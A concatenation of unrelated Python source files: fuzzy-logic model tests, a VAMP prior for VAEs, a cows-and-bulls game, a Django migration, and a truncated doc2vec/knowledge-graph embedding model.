acceleration.adjectives['stop'] = a_stop = Adjective(Polygon([(-10.,0.),(0.,1.),(10.,0.)]),COM=COM)
acceleration.adjectives['right_slow'] = a_right_slow = Adjective(Polygon([(0.,0.),(10.,1.),(20.,0.)]),COM=COM)
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
from fuzzy.Rule import Rule
from fuzzy.norm.Max import Max
#from fuzzy.norm.Min import Min
#from fuzzy.norm.BoundedDifference import BoundedDifference
#from fuzzy.norm.DrasticSum import DrasticSum
from fuzzy.norm.EinsteinSum import EinsteinSum
from fuzzy.norm.DombiUnion import DombiUnion
from fuzzy.operator.Compound import Compound
from fuzzy.operator.Input import Input
from fuzzy.operator.Not import Not
system.rules['stop'] = Rule(
adjective=a_stop,
# it gets its value from here
operator=Compound(
Max(),
Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["up"]),
Input(system.variables["dPhi_dT"].adjectives["stop"])
),
Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["up_right"]),
Input(system.variables["dPhi_dT"].adjectives["ccw_slow"])
),
Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["up_left"]),
Input(system.variables["dPhi_dT"].adjectives["cw_slow"])
)
),
CER=CER
)
system.rules['tilts right'] = Rule(
adjective=a_right_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Not(
Compound(
AlgebraicProduct(),
Compound(
AlgebraicSum(),
Input(system.variables["X"].adjectives["left_near"]),
Input(system.variables["X"].adjectives["left_far"])
),
Compound(
EinsteinSum(),
Input(system.variables["dX_dT"].adjectives["left_slow"]),
Input(system.variables["dX_dT"].adjectives["left_fast"])
)
),
),
Input(system.variables["Phi"].adjectives["up_right"])
),
CER=CER
)
system.rules['tilts left'] = Rule(
adjective=a_left_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Not(
Compound(
AlgebraicProduct(),
Compound(
AlgebraicSum(),
Input(system.variables["X"].adjectives["right_near"]),
Input(system.variables["X"].adjectives["right_far"])
),
Compound(
DombiUnion(0.25),
Input(system.variables["dX_dT"].adjectives["right_slow"]),
Input(system.variables["dX_dT"].adjectives["right_fast"])
)
),
),
Input(system.variables["Phi"].adjectives["up_left"])
),
CER=CER
)
system.rules['far right'] = Rule(
adjective=a_right_fast,
# it gets its value from here
operator=Input(system.variables["Phi"].adjectives["up_more_right"]),
CER=CER
)
system.rules['far left'] = Rule(
adjective=a_left_fast,
# it gets its value from here
operator=Input(system.variables["Phi"].adjectives["up_more_left"]),
CER=CER
)
system.rules['accelerate cw if down'] = Rule(
adjective=a_right_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["down"]),
Compound(
AlgebraicProduct(),
Input(system.variables["dPhi_dT"].adjectives["cw_slow"]),
Input(system.variables["dPhi_dT"].adjectives["cw_slow"]),
)
),
CER=CER
)
system.rules['accelerate ccw if down'] = Rule(
adjective=a_left_slow,
# it gets its value from here
operator=Compound(
AlgebraicProduct(),
Input(system.variables["Phi"].adjectives["down"]),
Compound(
AlgebraicProduct(),
Input(system.variables["dPhi_dT"].adjectives["ccw_slow"]),
Input(system.variables["dPhi_dT"].adjectives["ccw_slow"]),
)
),
CER=CER
)
return system
def test_system_from_pyfuzzy(self):
" shoud return the correct corresponding Model for the pyfuzzy object "
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
self._test_new_vs_expected_fuzzy_sysem(new_pyfuzzy_system, pyfuzzy_system_expected)
def _test_new_vs_expected_fuzzy_sysem(self, new_pyfuzzy_system, pyfuzzy_system_expected):
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
for var_name, var in pyfuzzy_system_expected.variables.items():
new_var = new_pyfuzzy_system.variables[var_name]
self.assertIsInstance(new_var, var.__class__)
self.assertEquals(new_var.description, var.description)
self.assertEquals(new_var.min, var.min)
self.assertEquals(new_var.max, var.max)
self.assertEquals(new_var.unit, var.unit)
for adj_name, adj in var.adjectives.items():
new_adj = var.adjectives[adj_name]
self._test_adj(adj, new_adj)
#: is input
if hasattr(var, 'fuzzify'):
self._test_fuzzify(var.fuzzify, new_var.fuzzify)
#: output
else:
self._test_defuzzify(var.defuzzify, new_var.defuzzify)
# import pdb; pdb.set_trace()
var_value = var.getValue()
new_var_value = new_var.getValue()
# if var_value != new_var_value:
self.assertEquals(new_var_value, var_value)
for rule_name, rule in pyfuzzy_system_expected.rules.items():
new_rule = new_pyfuzzy_system.rules[rule_name]
self._test_rule(rule, new_rule)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
def _test_rules_adj_in_out_adjs(self, system):
"test if all the rules's adj are the same instance of an output adj"
outputs_adjs = []
for var_name, var in system.variables.items():
#: is output
if not hasattr(var, 'fuzzify'):
for adj_name, adj in var.adjectives.items():
outputs_adjs.append(adj)
for rule_name, rule in system.rules.items():
self.assertIn(rule.adjective, outputs_adjs)
def _test_adj(self, adj, new_adj):
" test only a given adjective "
self.assertIsInstance(new_adj, adj.__class__)
self._test_set(adj.set, new_adj.set)
if adj.COM is not None and new_adj.COM is not None:
self._test_norm(adj.COM, new_adj.COM)
membership = adj.getMembership()
new_membership = new_adj.getMembership()
# if membership != new_membership:
# import pdb; pdb.set_trace()
self.assertEquals(
membership,
new_membership,
msg="%s != %s in %s" % (membership, new_membership, adj)
)
def _test_set(self, set, new_set):
" test only a given set "
self.assertIsInstance(new_set, set.__class__)
params = []
try:
for arg in inspect.getargspec(set.__init__).args:
if arg != 'self':
params.append(arg)
# will raise this exception when the given type don't implement a __init__ function
# (never overrided the object.__init__)
except TypeError:
pass
for param_name in params:
arg = getattr(set, param_name)
new_arg = getattr(new_set, param_name)
self.assertEquals(new_arg, arg)
cog = None
new_cog = None
try:
cog = set.getCOG()
except Exception, e:
# self.assertRaises(Exception, new_set.getCOG)
self.assertRaisesMessage(Exception, e.message, new_set.getCOG)
else:
new_cog = new_set.getCOG()
self.assertEquals(new_cog, cog)
self.assertEquals(new_set.points, set.points)
def _test_norm(self, norm, new_norm):
" test only a given norm "
self.assertIsInstance(new_norm, norm.__class__)
params = []
try:
for arg in inspect.getargspec(norm.__init__).args:
if arg != 'self':
params.append(arg)
# will raise this exception when the given type don't implement a __init__ function
# (never overrided the object.__init__)
except TypeError:
pass
for param_name in params:
arg = getattr(norm, param_name)
new_arg = getattr(new_norm, param_name)
self.assertEquals(new_arg, arg)
self.assertEquals(new_norm.UNKNOWN, norm.UNKNOWN)
self.assertEquals(new_norm.T_NORM, norm.T_NORM)
self.assertEquals(new_norm.S_NORM, norm.S_NORM)
def _test_fuzzify(self, fuzzify, new_fuzzify):
" test only a given fuzzify "
self.assertIsInstance(new_fuzzify, fuzzify.__class__)
def _test_defuzzify(self, defuzzify, new_defuzzify):
" test only a given fuzzify "
self.assertIsInstance(new_defuzzify, defuzzify.__class__)
params = []
try:
for arg in inspect.getargspec(defuzzify.__init__).args:
if arg != 'self' and arg != 'INF' and arg != 'ACC':
params.append(arg)
# will raise this exception when the given type don't implement a __init__ function
# (never overrided the object.__init__)
except TypeError:
pass
for param_name in params:
arg = getattr(defuzzify, param_name)
new_arg = getattr(new_defuzzify, param_name)
self.assertEquals(new_arg, arg)
self._test_norm(defuzzify.INF, new_defuzzify.INF)
self._test_norm(defuzzify._INF, new_defuzzify._INF)
self._test_norm(defuzzify.ACC, new_defuzzify.ACC)
self._test_norm(defuzzify._ACC, new_defuzzify._ACC)
def _test_rule(self, rule, new_rule):
"test only a given rule"
self.assertIsInstance(new_rule, rule.__class__)
self.assertEquals(rule.certainty, new_rule.certainty)
self._test_adj(rule.adjective, new_rule.adjective)
self._test_norm(rule.CER, new_rule.CER)
self._test_norm(rule.CER, new_rule.CER)
self._test_operator(rule.operator, new_rule.operator)
def _test_operator(self, operator, new_operator):
"test only a given rule"
self.assertIsInstance(new_operator, operator.__class__)
if operator.__class__.__name__ == 'Compound':
self._test_norm(operator.norm, new_operator.norm)
for i_inputs in xrange(0, len(operator.inputs)):
inp = operator.inputs[i_inputs]
new_inp = new_operator.inputs[i_inputs]
self._test_operator(inp, new_inp)
elif operator.__class__.__name__ == 'Const':
self.assertEquals(new_operator.value, operator.value)
elif operator.__class__.__name__ == 'Input':
self._test_adj(operator.adjective, new_operator.adjective)
elif operator.__class__.__name__ == 'Not':
self._test_operator(operator.input, new_operator.input)
op_call = operator()
new_op_call = new_operator()
self.assertEquals(
op_call,
new_op_call,
msg="%s != %s in %s" % (op_call, new_op_call, operator)
)
def test_set_only(self):
" should return the correct outout when only changing the set to a SetModel in th System "
from fuzzy_modeling.models import AdjectiveModel
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
COM = AlgebraicSum()
a_stop = Adjective(Polygon([(-10., 0.), (0., 1.), (10., 0.)]), COM=COM)
a_stop.name = 'stop'
new_a_stop = AdjectiveModel.from_pyfuzzy(a_stop).get_pyfuzzy()
new_pyfuzzy_system.variables['a'].adjectives['stop'] = new_a_stop
self._test_new_vs_expected_fuzzy_sysem(new_pyfuzzy_system, pyfuzzy_system_expected)
def test_output_variable_only(self):
" should return the correct outout when only changing the outputvar to a OutputVariableModel in th System "
from fuzzy_modeling.models import OutputVariableModel
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
from fuzzy.defuzzify.COG import COG
from fuzzy.OutputVariable import OutputVariable
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
COG = COG(INF=INF, ACC=ACC, failsafe=0., segment_size=0.5)
acceleration = OutputVariable(
defuzzify=COG,
description='acceleration',
min=-50.,
max=50.,
unit='meter per second^2')
acceleration.adjectives['left_fast'] = a_left_fast = Adjective(Polygon([(-50.,0.),(-20.,1.),(-10.,0.)]),COM=COM)
acceleration.adjectives['left_slow'] = a_left_slow = Adjective(Polygon([(-20.,0.),(-10.,1.),(0.,0.)]),COM=COM)
acceleration.adjectives['stop'] = a_stop = Adjective(Polygon([(-10.,0.),(0.,1.),(10.,0.)]),COM=COM)
acceleration.adjectives['right_slow'] = a_right_slow = Adjective(Polygon([(0.,0.),(10.,1.),(20.,0.)]),COM=COM)
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
acceleration.name = 'a'
new_acceleration = OutputVariableModel.from_pyfuzzy(acceleration).get_pyfuzzy()
new_pyfuzzy_system.variables['a'] = acceleration
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertNotEquals(output_dict1['a'], output_dict2['a'])
def test_output_variable_changing_one_sets_only(self):
" should return the correct output when changing all the sets to the new instance of same value "
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
from fuzzy.defuzzify.COG import COG
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
COG = COG(INF=INF, ACC=ACC, failsafe=0., segment_size=0.5)
acceleration = new_pyfuzzy_system.variables['a']
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
new_pyfuzzy_system.variables['a'] = acceleration
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertNotEquals(output_dict1['a'], output_dict2['a'])
def test_output_variable_changing_one_set_and_rule(self):
" should return the correct output when changing all the sets to the new instance of same value, and changing the corresponding rule "
from fuzzy_modeling.models import OutputVariableModel
from fuzzy.norm.AlgebraicSum import AlgebraicSum
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
from fuzzy.Adjective import Adjective
from fuzzy.set.Polygon import Polygon
from fuzzy.defuzzify.COG import COG
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
INF = AlgebraicProduct()
ACC = AlgebraicSum()
COM = AlgebraicSum()
COG = COG(INF=INF, ACC=ACC, failsafe=0., segment_size=0.5)
acceleration = new_pyfuzzy_system.variables['a']
acceleration.adjectives['right_fast'] = a_right_fast = Adjective(Polygon([(10.,0.),(20.,1.),(50.,0.)]),COM=COM)
new_pyfuzzy_system.rules['far right'].adjective = a_right_fast
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.fuzzify(i_dict1)
pyfuzzy_system_expected.inference()
pyfuzzy_system_expected.defuzzify(output_dict1)
new_pyfuzzy_system.fuzzify(i_dict2)
new_pyfuzzy_system.inference()
new_pyfuzzy_system.defuzzify(output_dict2)
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
def test_rule_has_same_adjs_as_output_only(self):
" check if a rule has the same adjectives as the output"
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
self._test_rules_adj_in_out_adjs(pyfuzzy_system_expected)
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
def test_system_from_pyfuzzy_changing_a_single_rule(self):
"test if work changing a single rule"
from fuzzy.Rule import Rule
from fuzzy.operator.Input import Input
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
CER = AlgebraicProduct()
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
a_right_fast = new_pyfuzzy_system.variables["a"].adjectives["right_fast"]
far_right = Rule(
adjective=a_right_fast,
# it gets its value from here
operator=Input(new_pyfuzzy_system.variables["Phi"].adjectives["up_more_right"]),
CER=CER
)
new_pyfuzzy_system.rules['far right'] = far_right
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
def test_system_from_pyfuzzy_changing_a_single_rule_from_model(self):
"test if work changing a single rule, but from model"
from fuzzy_modeling.models import RuleModel
from fuzzy.Rule import Rule
from fuzzy.operator.Input import Input
from fuzzy.norm.AlgebraicProduct import AlgebraicProduct
CER = AlgebraicProduct()
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = self._createSystem()
system_model = SystemModel.from_pyfuzzy(self._createSystem())
output_a = new_pyfuzzy_system.variables["a"]
output_a.name = 'a'
a_right_fast = output_a.adjectives["right_fast"]
a_right_fast.name = 'right_fast'
far_right = Rule(
adjective=a_right_fast,
# it gets its value from here
operator=Input(new_pyfuzzy_system.variables["Phi"].adjectives["up_more_right"]),
CER=CER
)
far_right.name = 'far right'
rule_model = RuleModel.from_pyfuzzy(far_right, new_pyfuzzy_system, system_model)
new_rule = rule_model.get_pyfuzzy(new_pyfuzzy_system)
# new_rule.operator = Input(new_pyfuzzy_system.variables["Phi"].adjectives["up_more_right"])
new_pyfuzzy_system.rules['far right'] = new_rule
self._test_rules_adj_in_out_adjs(new_pyfuzzy_system)
import math
input_dict = {}
input_dict["X"] = 0.0 #: position [m]
input_dict["dX_dT"] = 0.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(45.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(0.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
def test_system_from_pyfuzzy_with_other_input(self):
" shoud return the correct corresponding Model for the pyfuzzy object with another input"
pyfuzzy_system_expected = self._createSystem()
new_pyfuzzy_system = SystemModel.from_pyfuzzy(pyfuzzy_system_expected).get_pyfuzzy()
import math
input_dict = {}
input_dict["X"] = 190.0 #: position [m]
input_dict["dX_dT"] = 500.0 #: velocity [m/s]
input_dict["Phi"] = math.radians(270.0) #: angle [rad]
input_dict["dPhi_dT"] = math.radians(90.0) #: angle velocity [rad/s]
i_dict1 = input_dict.copy()
i_dict2 = input_dict.copy()
output_dict1 = {
'a' : 0.0 #: acceleration [m/s²]
}
output_dict2 = {
'a' : 0.0 #: acceleration [m/s²]
}
pyfuzzy_system_expected.calculate(i_dict1, output_dict1)
new_pyfuzzy_system.calculate(i_dict2, output_dict2)
self.assertEquals(output_dict1['a'], output_dict2['a'])
| 2.703125 | 3 |
markovdwp/priors/vamp.py | ivannz/MarkovDWP | 0 | 12797981 | <gh_stars>0
import math
import torch
class VAMP(torch.nn.Module):
"""Varational Mixture of Posteriors prior by <NAME> Welling (2017).
URL
---
https://arxiv.org/abs/1705.07120
"""
def __init__(self, encoder, n_sample=50):
super().__init__()
self.encoder = encoder
# pseudoinputs
self.pseudoinputs = torch.nn.Parameter(
torch.Tensor(n_sample, *encoder.input_shape)
)
self.reset_pseudoinputs()
def reset_pseudoinputs(self):
self.pseudoinputs.data.normal_(mean=0., std=0.01)
@property
def event_shape(self):
return self.encoder.event_shape
def rsample_from_index(self, index):
"""Draw diffenretiable variates from VAMP modes specified by `index`.
"""
q = self.encoder(self.pseudoinputs[index.flatten()])
return q.rsample().reshape(*index.shape, *self.event_shape)
def rsample(self, sample_shape):
r"""Draw diffenretiable variates from VAMP.
Details
-------
Since VAMP is $\pi(z) = \frac1K \sum_k q(z\mid u_k)$, i.e. the mixture
proibabilities are uniform and fixed, there is no need for REINFORCE.
"""
if not isinstance(sample_shape, torch.Size):
sample_shape = torch.Size(sample_shape)
# index is uniformly random, and not learnable, thus no need to backprop
# through it and hence no need for reinforce gradients
index = torch.randint(len(self.pseudoinputs),
size=(sample_shape.numel(),))
return self.rsample_from_index(index.reshape(*sample_shape))
@torch.no_grad()
def sample(self, sample_shape):
"""Generate a `sample_shape` shaped sample from VAMP."""
return self.rsample(sample_shape)
def log_prob(self, value):
r"""Differentiable log-probability of the VAMP prior.
Details
-------
VAMP prior (Varational Mixture of Posteriors) is variant of emprirical
Bayes prior learnt long with the VAE from the data. It the following
mixture $
\pi(z) = \tfrac1K \sum_k q(z \mid u_k)
$ where $q(z|x)$ is the approximate posterior represented by the
encoder network (with some distribution on output) and $u_k$ are
learnable `pseudoinputs`, that detrmine the modes of the prior.
The log-probability is log-sum-exp of log-probs of the VAE's encoder at
each pseudoinput:
$$
\log \pi(z)
= \log \Bigl(
\sum_k \exp{ \{
\log q(z\mid u_k)
\} }
\Bigr) - \log K
\,. $$
"""
n_dim = len(self.event_shape)
assert value.shape[-n_dim:] == self.event_shape
# q has batch_shape `n_sample` (q_k(z) = q(z \mid u_k))
q = self.encoder(self.pseudoinputs)
# broadcast value so that `log_q` has shape `*batch_shape x n_sample`,
# where `batch_shape` is the leading dimensions of `value`
log_q = q.log_prob(value.unsqueeze(-n_dim-1))
# vamp is \tfrac1K \sum_k q(z \mid u_k)
# log-sum-exp-average along the pseudoinput dimension
return log_q.logsumexp(dim=-1) - math.log(len(self.pseudoinputs))
| 2.71875 | 3 |
09-revisao/practice_python/cows_and_bulls.py | lcnodc/codes | 1 | 12797982 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Exercise 18: Cows And Bulls
Create a program that will play the “cows and bulls” game with the user.
The game works like this:
Randomly generate a 4-digit number. Ask the user to guess a 4-digit
number.
For every digit that the user guessed correctly in the correct place,
they have a “cow”. For every digit the user guessed correctly in the
wrong place is a “bull.” Every time the user makes a guess, tell them
how many “cows” and “bulls” they have. Once the user guesses the correct
number, the game is over.
Keep track of the number of guesses the user makes throughout teh game
and tell the user at the end.
Say the number generated by the computer is 1038. An example interaction
could look like this:
Welcome to the Cows and Bulls Game!
Enter a number:
>>> 1234
2 cows, 0 bulls
>>> 1256
1 cow, 1 bull
Until the user guesses the number.
"""
import random
def get_secret_number():
""" Define the secret number and write it to a file.
"""
secret_number = str(random.randint(1000, 9999))
with open("secret_number.txt", "w") as file:
print(secret_number, file=file)
return secret_number
def get_cows_and_bulls(secret, user):
"""Calculate the amount of cows and bulls.
"""
cows = bulls = 0
secret_chars = secret
for i in range(len(secret)):
if user[i] == secret[i]:
cows += 1
if user[i] in secret_chars:
bulls += 1
secret_chars = remove_char(secret_chars, user[i])
return cows, bulls
def remove_char(s, c):
"""Remove a char of the string.
When a user character exist in a secret_chars, add 1 to bulls and
remove it of secret_chars to don't duplicate the count
"""
list_chars = list(s)
list_chars.remove(c)
return "".join(list_chars)
if __name__ == "__main__":
guessed = False
attempts = 0
secret = get_secret_number()
while not guessed:
user = input("Guess a 4-digit number: ")
attempts += 1
if user == secret:
guessed = True
print("%i cows, %i bulls" % (get_cows_and_bulls(secret, user)))
print(
"Congrats! The number is %s. You did %s attempts." %
(secret, attempts))
| 4.375 | 4 |
finliveapp/migrations/0028_gasmeasurement_unique gas measurement.py | FinLiveRI/FinLiveApp | 0 | 12797983 | <reponame>FinLiveRI/FinLiveApp<filename>finliveapp/migrations/0028_gasmeasurement_unique gas measurement.py
# Generated by Django 3.2.4 on 2021-12-14 11:17
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('finliveapp', '0027_gassystem_wind_direction'),
]
operations = [
migrations.AddConstraint(
model_name='gasmeasurement',
constraint=models.UniqueConstraint(fields=('equipment', 'start_time'), name='unique gas measurement'),
),
]
| 1.554688 | 2 |
models.py | DSRnD/UMLs | 0 | 12797984 | <reponame>DSRnD/UMLs
import torch
import torch.nn as nn
import torch.nn.functional as F
import random
import numpy as np
import torch.autograd as autograd
class NegativeSampling(nn.Module):
"""Negative sampling loss as proposed by <NAME> al. in Distributed
Representations of Words and Phrases and their Compositionality.
"""
def __init__(self):
super(NegativeSampling, self).__init__()
self._log_sigmoid = nn.LogSigmoid()
def forward(self, scores):
"""Computes the value of the loss function.
Parameters
----------
scores: autograd.Variable of size (batch_size, num_noise_words + 1)
Sparse unnormalized log probabilities. The first element in each
row is the ground truth score (i.e. the target), other elements
are scores of samples from the noise distribution.
"""
try:
k = scores.size()[1] - 1
return -torch.sum(
self._log_sigmoid(scores[:, 0])
+ torch.sum(self._log_sigmoid(-scores[:, 1:]), dim=1) / k
) / scores.size()[0]
except:
k = 1
return -torch.sum(torch.sum(self._log_sigmoid(scores)))
class marginLoss(nn.Module):
def __init__(self):
super(marginLoss, self).__init__()
def forward(self, pos, neg, margin):
val = pos - neg + margin
return torch.sum(torch.max(val, torch.zeros_like(val)))
def projection_transH(original, norm):
return original - torch.sum(original * norm, dim=1, keepdim=True) * norm
def projection_DistMult(original, norm1, norm2):
return torch.sum(original * norm1, dim=1, keepdim=True) * norm2
def projection_transD(original, norm):
return original + torch.sum(original * norm, dim=1, keepdim=True) * norm
class Link_Model(nn.Module):
"""Link prediction model"""
def __init__(self, kg_model):
self.vec_dim = vec_dinm
self.out_dim = out_dim
self.kg_model = kg_model
#self.linear1 = nn.Linear(self.vec_dim, self.out_dim)
self.linear = nn.Linear(1, 1, bias=True, requires_grad=True)
def forward(self, hi, ti, ri):
with torch.no_grad():
_, _, _, _, pos, _ = self.kg_model(_, _, _, hi, ti, ri, _)
out = self.linear(pos)
return out
class D2V_KG(nn.Module):
"""Doc2vec model with transh loss
"""
def __init__(self, vec_dim, num_docs, num_words, n_rel, d2v_model_ver, kg_model_ver, margin, delta):
super(D2V_KG, self).__init__()
self.num_docs = num_docs
self.margin = margin
self.delta = delta
self.kg_model_ver = kg_model_ver
self.d2v_model_ver = d2v_model_ver
if d2v_model_ver == 'dm':
self.d2v = DM(vec_dim, num_docs, num_words)
else:
self.d2v = DBOW(vec_dim, num_docs, num_words)
self.cost_func = NegativeSampling()
self.kg_loss_fn = marginLoss()
self.W_R = nn.Parameter(
torch.randn(n_rel, vec_dim), requires_grad=True)
self.D_R = nn.Parameter(
torch.randn(n_rel, vec_dim), requires_grad=True)
self.M_R = nn.Parameter(
torch.randn(n_rel, vec_dim, vec_dim), requires_grad=True)
normalize_entity_emb = F.normalize(self.d2v._D.data, p=2, dim=1)
normalize_relation_emb = F.normalize(self.W_R.data, p=2, dim=1)
normalize_norm_emb = F.normalize(self.D_R.data, p=2, dim=1)
self.d2v._D.data = normalize_entity_emb
self.W_R.data = normalize_relation_emb
self.D_R.data = normalize_norm_emb
def forward(self, context_ids, doc_ids, target_noise_ids, hi, ti, ri, tj):
"""Sparse computation of scores (unnormalized log probabilities)
that should be passed to the negative sampling loss.
Parameters
----------
context_ids: torch.Tensor of size (batch_size, num_context_words)
Vocabulary indices of context words.
doc_ids: torch.Tensor of size (batch_size,)
Document indices of paragraphs.
target_noise_ids: torch.Tensor of size (batch_size, num_noise_words + 1)
Vocabulary indices of target and noise words. The first element in
each row is the ground truth index (i.e. the target), other
elements are indices of samples from the noise distribution.
hi: torch.Tensor of size (batch_size,)
Heads from golden triplets from relational graph
ti: torch.Tensor of size (batch_size,)
Tails from golden triplets from relational graph
ri: torch.Tensor of size (batch_size,)
Relations from golden triplets from relational graph
tj: torch.Tensor of size (batch_size,)
Tails from noisy triplets from relational graph
Returns
-------
autograd.Variable of size (batch_size, num_noise_words + 1)
"""
hi_emb = self.d2v._D[hi,:]
ti_emb = self.d2v._D[ti,:]
w_ri_emb = self.W_R[ri,:]
d_ri_emb = self.D_R[ri,:]
#tj = random.sample(np.arange(0,self.num_docs).tolist(), hi_emb.shape[0])
#if torch.cuda.is_available():
# tj = torch.LongTensor(np.asarray(tj)).to(torch.device('cuda'))
tj_emb = self.d2v._D[tj,:]
pos = None
neg = None
if self.kg_model_ver == 'transh':
pos_h_e = projection_transH(hi_emb, d_ri_emb)
pos_t_e = projection_transH(ti_emb, d_ri_emb)
neg_h_e = projection_transH(hi_emb, d_ri_emb)
neg_t_e = projection_transH(tj_emb, d_ri_emb)
pos = torch.sum((pos_h_e + w_ri_emb - pos_t_e) ** 2, 1)
neg = torch.sum((neg_h_e + w_ri_emb - neg_t_e) ** 2, 1)
